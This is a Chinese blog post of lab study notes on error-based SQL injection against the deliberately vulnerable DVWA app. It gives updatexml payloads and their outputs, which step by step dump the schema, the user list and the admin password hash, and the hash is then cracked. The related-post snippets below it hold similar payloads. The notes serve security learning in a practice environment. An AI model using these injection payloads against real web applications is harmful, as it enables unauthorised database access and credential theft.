SQL注入入门学习笔记:DVWA-SQL注入之报错注入

已于 2023-10-11 01:22:08 修改
阅读量232 收藏 1
点赞数
文章标签: web安全
于 2023-10-11 01:03:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_78774803/article/details/133759176
版权

1.获取当前数据库名:
方法一:1' and updatexml(1,concat(0x7e,(select database()),0x7e),3)#
方法二:1' and updatexml(1,concat(0x7e,database(),0x7e),3)#
方法三:1' and updatexml(1,'~database()~',3)#
以上三种输入均可,结果为:XPATH syntax error: '~dvwa~'
(1)第一个~号必须有,否则系统不会将database()当成一个函数来处理,而是将database当成字符串,如:输入
1' and updatexml(1,'database()~',3)#的结果为:XPATH syntax error: '()~'
(2)可将0x7e的格式改为'~'(单引号不可省),如:
1' and updatexml(1,concat('~',(select database()),'~'),3)#


2.获取所有数据库名:
1' and updatexml(1,
                   concat('~',
                             substr((select group_concat(schema_name) 
                                 from information_schema.schemata),1,31)
                          ,'~')
                ,3)-- 
结果为:XPATH syntax error: '~information_schema,dvwa~'

3.获取表名
1' and updatexml(1,concat('~',substr((select group_concat(table_name) from information_schema.tables 
              where table_schema = 'dvwa'),1,31),'~'),3)-- 
结果为:XPATH syntax error: '~guestbook,users~'

4.获取字段名
1' and updatexml(1,concat('~',substr((select group_concat(column_name) from information_schema.columns 
              where table_schema = 'dvwa' and table_name = 'users'),1,31),'~'),3)-- 
结果为:XPATH syntax error: '~user_id,first_name,last_name,us'
从结果看,最后的us明显是没有显示完,而是被substr截取了,所以要修改substr的第二个参数来继续获取之后的字段名
1' and updatexml(1,concat('~',substr((select group_concat(column_name) from information_schema.columns 
              where table_schema = 'dvwa' and table_name = 'users'),32,31),'~'),3)-- 
结果为:XPATH syntax error: '~er,password,avatar,last_login,f'
从结果看,最后的f明显是没有显示完,而是被substr截取了,所以要修改substr的第二个参数来继续获取之后的字段名
1' and updatexml(1,concat('~',substr((select group_concat(column_name) from information_schema.columns 
              where table_schema = 'dvwa' and table_name = 'users'),63,31),'~'),3)-- 
结果为:XPATH syntax error: '~ailed_login~',此时出现了后面的~,说明已经显示完,不需继续获取,最终结果为:
综上,数据库dvwa的‘users'表中,所有的字段名为:
user_id,first_name,last_name,user,password,avatar,last_login,failed_login

5.获取数据
(1)获取数据库dvwa的‘users'表中有多少条数据
1' and updatexml(1,concat('~',(select count(*) from dvwa.users) ,'~'),3)--
结果为:XPATH syntax error: '~5~' ,说明表中有5条记录
(2)获取数据库dvwa的‘users'表中“user”列中的数据
1' and updatexml(1,concat('~',substr( (select group_concat(user) from dvwa.users) ,1,31),'~'),3)-- 
结果为:XPATH syntax error: '~admin,gordonb,1337,pablo,smithy',最后的“~”没有出现,所以需要继续查询
1' and updatexml(1,concat('~',substr( (select group_concat(user) from dvwa.users) ,32,31),'~'),3)-- 
结果为:XPATH syntax error: '~~',最后一个“~”出现,说明已经显示完
综上,数据库dvwa的‘users'表中“user”列中的数据为:
admin,gordonb,1337,pablo,smithy
(3)获取数据库dvwa的‘users'表中“password”的数据
1' and updatexml(1,concat('~',substr((select password from dvwa.users where user = 'admin'),1,31),'~'),3)-- 
结果为:XPATH syntax error: '~5f4dcc3b5aa765d61d8327deb882cf9',最后的“~”没有出现,所以需要继续查询
1' and updatexml(1,concat('~',substr((select password from dvwa.users where user = 'admin'),32,31),'~'),3)-- 
结果为:XPATH syntax error: '~9~',最后一个“~”出现,说明已经显示完
综上,admin对应的password为:5f4dcc3b5aa765d61d8327deb882cf99,经md5解密出结果为:password
 

2301_78774803
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
sql注入渗透测试工具:sqlol/DVWA
04-24
sql注入渗透测试工具:sqlol/DVWA https://xianjie0318.blog.csdn.net/article/details/112987555?spm=1001.2014.3001.5502
DVWASQL注入详解(包含知识点)
10-20
该文档是使用DVWA平台进行的SQL注入(low)级别的详细操作和知识点分析,包括什么是SQL注入,如何进行SQL注入,图文并茂,包含了几个非常不错的操作,解决了各种问题。
SQL注入-报错注入
qq_65240014的博客
08-08 788
本文主要介绍一种结合burpsuite的报错注入sql注入方法
关于解决kali对主机dvwa进行sql注入失败问题
qq_36836233的博客
03-08 886
关于sqlmap的问题
Dvwa sql low 联合注入,报错注入
最新发布
m0_73581247的博客
06-03 301
rand 值)如果此时临时表只有 key 为 1 的行不存在 key 为 0 的行,那么数据库要将该条记录插入临。时表,由于是随机数,插时又要计算一下随机值,此时 floor(random(0)*2)结果可能为 1,就。如果 key 存在于临时表中,则更新临时表中的数据(更新数据时,不再计算 rand 值);实际测试中发现,出现报错,至少要求数据记录为 3 行,记录数超过 3 行一定会报错,2 行。输入1,数据正常显示,输入1’,页面显示爆错,1附近多出现了一个逗号。Id=1 and 1=2 页面无显示。
SQL注入DVWA靶场搭建及使用、sqlMap注入、sqlmap问题及解决办法)
tmzy1的博客
03-19 5858
SQL注入DVWA靶场搭建及使用、sqlMap注入、sqlmap问题及解决办法)
DVWAsql注入——联合注入和报错注入
Williamanddog的博客
12-20 1929
构造payload:1' and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 0,1)))#使用格式:updatexml(xml_document,xpath_string,new_value),作用是将document的中符合string 的字符串替换为value的值。
DVWASQL注入报错:Illegal mix of collations for operation ‘UNION‘的解决方法
Slimer
11-29 837
查看数据库发现,出现这个问题是因为information_schema数据库里面都是utf8_general_ci,而靶场网站user表中的数据都是utf8_unicode_ci。将user表中更改为与information_schema一样的就可以了。注:我最开始仅仅更改了表的,但是仍然出现了报错信息,后来发现需要逐一更改每一个字段。1. 使用数据库连接工具:DBeaver连接dvwa的数据库。最好把这几个表都改成utf8_general_ci,即可!查询表名的时候出现错误。这时候再次输入,即可!
学习sql注入漏洞网址的创建
06-06
这篇文章的主题是“学习sql注入漏洞网址的创建”,它旨在帮助初学者或研究人员建立一个自定义的环境来模拟SQL注入攻击,以便于理解和实践防御措施。下面将详细介绍这个过程以及涉及的相关知识点。 首先,SQL注入...
DVWA-master.zip
01-04
DVWA-master.zip文件包含了整个DVWA项目的源代码和相关资源,是学习和研究网络安全的理想工具。 1. **DVWA的结构与功能** DVWA由多个安全级别组成,包括“低”、“中”、“高”和“不可能”,每个级别都包含不同...
Web安全 学习日记5 - SQL盲注 和 报错注入 (DVWA)
qq_46081990的博客
03-11 477
SQL注入过程中,SQL语句执行查询后,查询数据不能回显到前端页面中,需要使用一些特殊的方式来判断,这个过程成为盲注。
DVWA(linux下)利用sqlmap进行--os-shell注入不能成功的错误处理
Spwpun的博客
11-16 9587
报错情况: 我在自己的kali linux虚拟机下面安装了DVWA渗透测试系统以便自己进行渗透测试的基础学习,在进行sqli(sql injection)-low级别的测试的时候,利用sqlmap进行注入,加上–os-shell参数获取shell(即系统下的命令行,windows下的cmd,linux下的terminal),发现不能执行。 最后总是报这样的错,unable to uploa...
漏洞防范:搭建漏洞靶场DVWA,DVWASQL注入漏洞,利用sqlmap把复杂的程序自动化
weixin_52371314的博客
10-12 1906
sql注入漏洞
自学渗透测试:使用 DVWA 和 SQLmap 探寻 SQL 注入攻击与防范
weixin_43263566的博客
01-04 2561
SQL注入漏洞
dvwa进行报错注入
m0_65150886的博客
08-29 179
table_schema='dvwa' 查询库名为dwa,table_name='users'查询表名为users,information_schema.columns 内置列,column_name列名,count(column_name)计算查询到的列数。1' and extractvalue(1,concat(0x7e,database()))# 可以看到有一个dvwa表。可以通过修改url中的值来修改查询的表,limit后面的+表示空格,1表示从哪个位置开始查询。首先将包发送给测试器。
[DVWA]利用SQL注入漏洞的方法
weixin_45942044的博客
11-22 1006
自学[DVWA]SQL注入漏洞的学习笔记
DVWA[SQL-Injection]报错注入学习记录
nareku的博客
07-06 524
还是以sql-injection为例爆个库:输入查询语句: 得到数据库库名为dvwa爆个表名: 接下来还是爆users表里面的user和password字段。在使用updatexml()这个函数的时候有需要注意的地方,具体参考:传送门输入查询语句: 因为updatexml只支持32位的报错,因此最好一行一行地使用 concat limit 与substr 逐个爆破,调一下参数就行联合一下前面的,就可以得到user和password...
DVWA靶场SQL注入(low)
qq_61975388的博客
08-17 585
DVWA靶场SQL注入实战
DVWA 1.9 SQL注入详解:新手教程与实战步骤
DVWA中,SQL注入是一个关键的学习模块,帮助安全专家和Web开发者了解和防御这类攻击。DVWA提供了不同安全级别的代码,使得学习过程更具挑战性。对于初学者来说,通过对比这些级别,可以学习到PHP代码审计的基本...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值